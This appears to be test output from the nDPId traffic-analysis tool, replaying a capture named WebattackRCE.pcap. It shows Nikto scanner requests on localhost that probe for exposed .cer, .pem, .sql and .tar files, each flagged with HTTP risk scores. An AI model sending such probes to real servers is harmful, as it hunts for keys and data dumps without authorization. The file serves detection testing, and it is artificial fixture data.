-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 